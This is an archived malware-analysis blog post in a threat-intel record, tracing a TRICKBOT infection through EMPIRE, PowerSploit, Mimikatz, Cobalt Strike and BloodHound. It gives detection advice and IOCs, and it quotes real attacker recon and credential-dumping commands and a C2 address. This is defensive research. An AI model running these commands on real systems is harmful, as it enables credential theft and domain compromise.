{ "id": "7a171973-7a24-4fcf-ad49-2e9a5b04ac10", "created_at": "2026-04-06T00:16:51.035311Z", "updated_at": "2026-04-10T03:36:36.778815Z", "deleted_at": null, "sha1_hash": "81032e08a5d05058cf87a625bb4a070ebdb63acb", "title": "TRICKBOT Analysis - Part II", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 894483, "plain_text": "TRICKBOT Analysis - Part II\r\nBy Mark R\r\nPublished: 2019-10-29 Β· Archived: 2026-04-05 21:58:12 UTC\r\nSome further TTPs used by TRICKBOT [1] from an infected host that I thought was interesting to share. The\r\nsample used here is from an EMOTET to TRICKBOT infection \"GTAG:mor14\" courtesy of Malware-Traffic-Analysis. πŸ‘πŸ‘\r\nSamples Used\r\nC:\\Users\\AUSER\\AppData\\Roaming\\netcloud\\Υ’ΥΆΥΈΦ‚Υ©Υ‘Υ£Φ€ΥΎΥΈΦ‚Υ΄ Υ§.exe\r\nC:\\Users\\AUSER\\AppData\\Roaming\\colorsallow.exe\r\nSHA256 Hash: 3A6C3F7B99B2E76914FBC338C622B92F9825CB77729B8BF050BA64ECE1679818\r\nContinuing on some past research on TRICKBOT's arsenal of modules, I knew that there was a PowerShell\r\nEMPIRE module NewBCtestDll64 but never saw it ITW (in-the-wild) myself.\r\n2018-10-08 - Quick post: #Trickbot gtag sat75 infection with #PowershellEmpire traffic -\r\nhttps://t.co/sU86nZJnh2 - part of ongoing US-based Paypal-themed Trickbot #malspam campaign.\r\nPowershell Empire traffic seems tied to the NewBCtestDll64 module (and probably the 32 bit version\r\npic.twitter.com/A5m64aIRd7\r\nβ€” Brad (@malware_traffic) October 10, 2018\r\nThis soon escalated to COBALT-STRIKE connectivity and BLOODHOUND reconnaissance.\r\nIn this observed activity, EMPIRE was used for reconnaissance and privledge escalation and COBALT-STRIKE\r\nfor delivering further recon via the means of BLOODHOUND - both tools attempted credential dumping with\r\nhttps://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/\r\nPage 1 of 10\n\nMIMIKATZ. The endgame here, is for the adversary to priv esc all the way to Domain Admin for full domain\r\ncompromise to then deliver one of the many ransomware variants such as RYUK [2] πŸ’£πŸ’£πŸ’£πŸ’₯πŸ’²πŸ’²πŸ’².\r\nRECENT NOTES ON EMPIRE\r\nFor those that do not know, PowerShell EMPIRE is a post exploitation framework written in PowerShell. This\r\nproject has recently retired due to the heighten uptake in PowerShell visibility over the last few years, the project\r\nhas stated it has reached its goal and has ended support.\r\nAlthough EMPIRE is now in retirement it is still being used ITW (in-the-wild). It still works, just not supported.\r\nI'd expect an uptake on other C2 post exploitation frameworks many such are listed here Remote Access Tools\r\nTHE RUNDOWN\r\nA quick series of events will unfold. Some of these are documented here. From EMOTET infection to CS\r\nconnectity it was less then 48hrs.\r\nDelivery via PHISHING 🎣\r\nEMOTET infection and persistence created.\r\nPushes TRICKBOT to steal data.\r\nFollow up EMPIRE C2 connectivity\r\n-POWERSPLOIT for recon/info-steal\r\n-MIMIKATZ for credential dumping/priv esc\r\nFollow up COBALT-STRIKE C2 connectivity\r\n-BLOODHOUND for domain recon/priv esc\r\nComplete Domain ownage (?)\r\nRansomware variant delivery. (?)\r\nGame Over !\r\nHighlighted was observed activity.\r\nHELLO POWERSHELL EMPIRE\r\nTo start off we identify the newly established EMPIRE connectivity.\r\nThe initial \"stager\" is the way the victim talks back to the EMPIRE C2 that is listening for the\r\nconnection to then download stage 2 which is the EMPIRE agent. The default launcher/stager is a\r\nPowerShell Base64 encoded/obsfucated command.\r\nBy capturing the PowerShell activity on our box (PowerShell Logging, Command Line audit logging EID 4688),\r\ndecoding and identifying the EMPIRE stager wasn't too difficult due to the fact most if not all the EMPIRE\r\ndefaults were left the same. CyberChef EMPIRE stager reciped used is available here.\r\nEMPIRE Stager\r\nhttps://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/\r\nPage 2 of 10\n\nOn decoding this Base64 blob of data, the key items to look for are the default settings for an EMPIRE stager as\r\ndocumented in the official EMPIRE Github repo. These defaults are;\r\nUser-agent:\r\nMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nSession Cookie field:\r\n\"Cookie\", \"session=XXXXXXXXXXXXXX\"\r\nOn of the following URLs:\r\n/login/process.php\r\n/admin/get.php\r\n/admin/news.php\r\nYou can see the decoded result and highlighted fields\r\nWe can see that the values were left as defaults as per Github EMPIRE Repo. For reference, the default user agent\r\nstring and URLs for EMPIRE.\r\nhttps://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/\r\nPage 3 of 10\n\nSTEP IN POWERSPLOIT\r\nOnce the EMPIRE connection is established we see plenty of follow up POWERSPLOIT activity.\r\nPowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers\r\nduring all phases of an assessment. PowerSploit is comprised of the following modules:\r\nCodeExecution, ScriptModification, Persistence, AntivirusBypass, Exfiltration, Mayhem, Privesc,\r\nRecon.\r\nSimply put, the threat actor starts profiling or gathering a siutational awareness of their new environment they\r\nhave landed in.\r\nGet-NetComputer | Out-String | %{$_ + \"`n\"};\"`nGet-NetComputer completed!\"\r\nGet-NetComputer -OperatingSystem *server* | Out-String | %{$_ + \"`n\"};\"`nGet-NetComputer completed!\"\r\nGet-NetDomainTrust | Out-String | %{$_ + \"`n\"};\"`nGet-NetDomainTrust completed!\"\r\nGet-NetDomainController | Out-String | %{$_ + \"`n\"};\"`nGet-NetDomainController completed!\"\r\nInvoke-MapDomainTrust | ConvertTo-Csv -NoTypeInformation | Out-String | %{$_ + \"`n\"};\"`nInvoke-MapDomainTrust c\r\nFrom the manual - descriptions of each.\r\nGet-NetComputer - gets a list of all current servers in the domain\r\nGet-NetDomainTrust - gets all trusts for the current user's domain\r\nGet-NetForestTrust - gets all trusts for the forest associated with the current user's domain\r\nInvoke-MapDomainTrust - try to build a relational mapping of all domain trusts\r\nGet-NetDomainController - gets the domain controllers for the current computer's domain\r\nhttps://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/\r\nPage 4 of 10\n\nShortly after followed by an attempted credential dump using POWERSPLOIT's Invoke-Mimikatz -DumpCreds\r\nwhich actually failed in this environment.\r\n\"VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in\r\na new PowerShell process (the new PowerShell process will have a different memory layout, so the\r\naddress the PE wants might be free).\"\r\nMIMIKATZ within EMPIRE v2.1.1 20171106 / POWERSPLOIT v2.0 alpha seems problematic with the newer\r\nupdates of Windows 10. MIMIKATZ at the time of writing is at version v2.2.0-20190813. These frameworks are\r\nusing an outdated version. (Cheers DP - REDTEAM FRIEND πŸ‘πŸ‘)\r\nSTEP IN COBALTSTRIKE AND BLOODHOUND 🐢\r\nA quick background for those not in the know.\r\nCobalt Strike is software for Adversary Simulations and Red Team Operations...Cobalt Strike gives you\r\na post-exploitation agent and covert channels to emulate a quiet long-term embedded actor in your\r\ncustomer's network.\r\nhttps://www.cobaltstrike.com/\r\nBloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active\r\nDirectory environment. Attackers can use BloodHound to easily identify highly complex attack paths\r\nthat would otherwise be impossible to quickly identify\r\nhttps://github.com/BloodHoundAD/BloodHound\r\nI was originally suprised about the use of Invoke-BloodHound at first which is from the default BLOODHOUND\r\ningester SharpHound - ingester = data gatherer. SharpHound.ps1 - Runs the BloodHound C# Ingestor using\r\nreflection. With this little Bloodhound 101 first up was the CS stager and connectivity.\r\nThe following code kicks off a COBALT-STRIKE 'beacon stager'. This hosted stager, uses @MrUn1k0d3r's\r\n\"DONT KILL MY CAT\" (DKMC) πŸ™€ which obfuscates the shellcode to avoid detection when executed on the\r\nendpoint. This DKMC 'template' gives away the use of COBALT-STRIKE.\r\nURLScan Screenshot\r\nVirustotal\r\nDECODING COBALT-STRIKE PAYLOADS\r\nThe URL points to this hosted PowerShell script...\r\nhttps://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/\r\nPage 5 of 10\n\nBase64 and Gunzip decompress, decodes to a DKMC PowerShell stager with encoded and XOR encrypted\r\nshellcode.\r\nAnother Base64 decode and XOR decrypt using the hardcoded key 35. CyberChef doing the heavy work here.\r\nhttps://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/\r\nPage 6 of 10\n\nWhich leaves us with a nice COBALT-STRIKE C2 and USER AGENT string.\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts\r\n185.147.14[.]242\r\nOnce an active connection was made to the infected victim, a follow up series of recon commands were carried\r\nout via Get-NetLoggedon , Get-NetComputer | Out-String | %{$_ + \"`n\"};\"`nGet-NetComputer completed!\"\r\nand another attempt to dump credentials was made with Invoke-Mimikatz . Lastly we see the domain recon via\r\nBLOODHOUND\r\nSet-Alias Get-BloodHoundData Invoke-BloodHound\r\nInvoke-BloodHound -Threads 20 -CollectionMethod Default -Throttle 1000 -CSVFolder $(Get-Location) | Out-String\r\nWriting output to CSVs in: C:\\Users\\USER\\AppData\\Roaming\\netcloud\\\r\nDone writing output to CSVs in: C:\\Users\\USER\\AppData\\Roaming\\netcloud\\\r\nThis actually left artefacts on disk πŸ€·β€β™‚οΈ local_admins.csv , group_memberships.csv , trusts.csv and\r\nuser_sessions.csv .\r\nShortly after this activity ended (maybe they realised my AD topology wasn't too hot and the penny eventually\r\ndropped... ) connections were then severed.\r\nOTHER TRICKBOT OBSERVATIONS - ESENTUTL? .EDBs?\r\nOne other thing I noted with this TRICKBOT infection was the use of ESENT UTIL to gather IE and Explorer\r\nbrowser history and webcache. The below command was seen;\r\nesentutl /p /o C:\\Users\\USER\\AppData\\Local\\Temp\\grabber_temp.edb\r\nhttps://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/\r\nPage 7 of 10\n\n\"a centralized meta-data store for the browser using the proven \"JET Blue\" Extensible Storage Engine\r\n(ESE) database format\"\r\n\"Remember that even if a user never opens Internet Explorer, there may still be valuable records in their\r\nIE database including files opened on the local system, network shares, and removable devices\"\r\nhttps://digital-forensics.sans.org/blog/2015/06/03/ese-databases-are-dirty/\r\n\"browser history data and while Chrome and Firefox allow copying of the history files, the\r\nWebCacheV01.dat file that IE and Edge history are stored in is a locked file and cannot be copied using\r\nnative copy\"\r\nhttps://dfironthemountain.wordpress.com/tag/ese-database/\r\nArtefacts on disk will be in the form of a .RAW capture\r\nC:\\Users\\USER\\AppData\\Roaming\\grabber_temp.INTEG.RAW\r\nSnippet from the .RAW log file below. Seems to be validating/repairing the database before exfiltrating?\r\n***** Repair of database 'C:\\Users\\USER\\AppData\\Local\\Temp\\grabber_temp.edb' started [ESENT version 10.00.17763\r\nsearch for 'ERROR:' to find errors\r\nsearch for 'WARNING:' to find warnings\r\nchecking database header\r\nERROR: database was not shutdown cleanly (Dirty Shutdown)\r\ndatabase file \"C:\\Users\\USER\\AppData\\Local\\Temp\\grabber_temp.edb\" is 43515904 bytes\r\ndatabase file \"C:\\Users\\USER\\AppData\\Local\\Temp\\grabber_temp.edb\" is 43515904 bytes on disk.\r\nCreating 16 threads\r\nYou can download, NIRSOFT ESE Viewer to peak inside the .edb file to see what data has been staged. In\r\nsummary, the threat actors are looking for files and locations of interest on the network (?). Maybe profiling if you\r\nare a user? or to provide them context and situational awareness of the environment they have spawned into and\r\nwhere to pivot next such as file servers (?). ESENTUTL and EDB files are one to be aware of and possibly a\r\ncontender for DFIR professionals and πŸ”΅ teams to use also!\r\nAs a side note, other previously seen similar activities and ITW sightings courtesy of @AltShiftPrtScn πŸ”½ .\r\nAnother similar TRICKBOT post-exploitation but using PSEXEC and AdFind to help deploy RYUK ransomware\r\nto the environment. A Nasty Trick: From Credential Theft Malware to Business Disruption\r\nAgain, different attack paths, key sightings on TRICKBOT using EMPIRE/POSHC2 to deliver the \"cyber-aids\"\r\nπŸ˜‚\r\nUsually it's FAKEUPDATES -\u003e DRIDEX | TRICKBOT -\u003e EMPIRE -\u003e CYBERAIDS, but what I just\r\nsaw was FAKEUPDATES -\u003e DRIDEX -\u003e POSHC2. We stopped it obviously before the CYBERAIDS.\r\nHighly recommend not catching the CYBERAIDS.\r\nhttps://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/\r\nPage 8 of 10\n\nβ€” Andrew Thompson (@QW5kcmV3) September 11, 2019\r\nWRAP UP\r\nThe combination of EMOTET's access-as-a-service model and TRICKBOT's offensive set of modular tooling,\r\nthey pose a real and current threat to businesses large and small. As stated before, once the infected systems have\r\nreported back - the threat actors can be pivoting further in your environment within (in this instance) \u003c48hrs and\r\nstart to elevate privledges to own the domain to ultimately deliver further badness such as ransomware. Using off\r\nthe shelf offensive tooling such as EMPIRE, COBALTSTRIKE, BLOODHOUND, POWERSPLOIT and the\r\ninfamous MIMIKATZ, detecting these tools are key in stopping the likes of TRICKBOT from moving further.\r\nAlso to note, is the time taken to detect, investigate and remediate. Doing this in a timely manner is highly\r\nrecommended. With the likes of offensive PowerShell becoming easiler to detect its only a matter of time before\r\nthese TTPs change once more. 🐱🐈`🐭🐁\r\nRECOMMENDATIONS\r\nTo avoid the \"cyber-aids\". I recommend;\r\nAs always defense in depth.\r\nPowershell visibility is still key for detection. (+transcription logging) - ship these off the host ASAP.\r\nCommandLine Logging - EventID 4688, Sysinternal SYSMON, EDR products.\r\nActive Directory auditing and logging to capture BLOODHOUND recon on AD objects. This could be\r\nincredible noisey depending on the environment but check out \"honey tokens\" for fake accounts that\r\nshould never be queried.\r\nDetect over the wire Bloodhound via IDS/NSM - large LDAP queries from unexpected hosts like clients.\r\nKnow whats normal first.\r\nFurther segregation of your network where possible to hinder lateral movement.\r\nπŸ‘Ύ Puple teaming excercises πŸ‘Ύ . Pre-running BLOODHOUND and proactively going after the same fuit\r\nof the attackers. Harden and repeat. #PurpleTeaming\r\nDetect TRICKBOT recon ipconfig /all , net config workstation , net view /all /domain , nltest\r\n/domain_trusts , nltest /domain_trusts within a short time frame/chained together).\r\nIOCS\r\nhttps://pastebin.com/kS6ZJT1W\r\nREFERENCES\r\n[1] TRICKBOT TA505 GROUP https://attack.mitre.org/groups/G0092/\r\n[2] North Korean APT(?) and recent Ryuk Ransomware attacks\r\nhttps://www.kryptoslogic.com/blog/2019/01/north-korean-apt-and-recent-ryuk-ransomware-attacks/\r\n[3] COBALT-STRIKE https://www.cobaltstrike.com/\r\n[4] BLOODHOUND https://github.com/BloodHoundAD/BloodHound\r\nhttps://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/\r\nPage 9 of 10\n\n[5] POWERSPLOIT https://github.com/PowerShellMafia/PowerSploit\r\n[6] EMPIRE https://github.com/EmpireProject/Empire\r\n[7] ESENTUTL https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875603(v%3Dws.11)\r\n[8] LOLBins https://lolbas-project.github.io/\r\n[9] For the LULZ, research into Attacking Powershell Empire\r\nhttps://sysopfb.github.io/malware/2019/10/05/Attacking-powershell-empire.html\r\nSource: https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/\r\nhttps://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/" ], "report_names": [ "trickbot-analysis-part-ii" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59", "created_at": "2024-06-19T02:03:08.128175Z", "updated_at": "2026-04-10T02:00:03.636663Z", "deleted_at": null, "main_name": "GOLD TAHOE", "aliases": [ "Cl0P Group Identity", "FIN11 ", "GRACEFUL SPIDER ", "SectorJ04 ", "Spandex Tempest ", "TA505 " ], "source_name": "Secureworks:GOLD TAHOE", "tools": [ "Clop", "Cobalt Strike", "FlawedAmmy", "Get2", "GraceWire", "Malichus", "SDBbot", "ServHelper", "TrueBot" ], "source_id": "Secureworks", "reports": null }, { "id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4", "created_at": "2022-10-25T15:50:23.5188Z", "updated_at": "2026-04-10T02:00:05.26565Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "TA505", "Hive0065", "Spandex Tempest", "CHIMBORAZO" ], "source_name": "MITRE:TA505", "tools": [ "AdFind", "Azorult", "FlawedAmmyy", "Mimikatz", "Dridex", "TrickBot", "Get2", "FlawedGrace", "Cobalt Strike", "ServHelper", "Amadey", "SDBbot", "PowerSploit" ], "source_id": "MITRE", "reports": null }, { "id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3", "created_at": "2023-01-06T13:46:38.860754Z", "updated_at": "2026-04-10T02:00:03.125179Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "SectorJ04", "SectorJ04 Group", "ATK103", "GRACEFUL SPIDER", "GOLD TAHOE", "Dudear", "G0092", "Hive0065", "CHIMBORAZO", "Spandex Tempest" ], "source_name": "MISPGALAXY:TA505", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e447d393-c259-46e2-9932-19be2ba67149", "created_at": "2022-10-25T16:07:24.28282Z", "updated_at": "2026-04-10T02:00:04.921616Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "ATK 103", "Chimborazo", "G0092", "Gold Evergreen", "Gold Tahoe", "Graceful Spider", "Hive0065", "Operation Tovar", "Operation Trident Breach", "SectorJ04", "Spandex Tempest", "TA505", "TEMP.Warlock" ], "source_name": "ETDA:TA505", "tools": [ "Amadey", "AmmyyRAT", "AndroMut", "Azer", "Bart", "Bugat v5", "CryptFile2", "CryptoLocker", "CryptoMix", "CryptoShield", "Dridex", "Dudear", "EmailStealer", "FRIENDSPEAK", "Fake Globe", "Fareit", "FlawedAmmyy", "FlawedGrace", "FlowerPippi", "GOZ", "GameOver Zeus", "GazGolder", "Gelup", "Get2", "GetandGo", "GlobeImposter", "Gorhax", "GraceWire", "Gussdoor", "Jaff", "Kasidet", "Kegotip", "Kneber", "LOLBAS", "LOLBins", "Living off the Land", "Locky", "MINEBRIDGE", "MINEBRIDGE RAT", "MirrorBlast", "Neutrino Bot", "Neutrino Exploit Kit", "P2P Zeus", "Peer-to-Peer Zeus", "Philadelphia", "Philadephia Ransom", "Pony Loader", "Rakhni", "ReflectiveGnome", "Remote Manipulator System", "RockLoader", "RuRAT", "SDBbot", "ServHelper", "Shifu", "Siplog", "TeslaGun", "TiniMet", "TinyMet", "Trojan.Zbot", "Wsnpoem", "Zbot", "Zeta", "ZeuS", "Zeus" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434611, "ts_updated_at": 1775792196, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/81032e08a5d05058cf87a625bb4a070ebdb63acb.pdf", "text": "https://archive.orkl.eu/81032e08a5d05058cf87a625bb4a070ebdb63acb.txt", "img": "https://archive.orkl.eu/81032e08a5d05058cf87a625bb4a070ebdb63acb.jpg" } }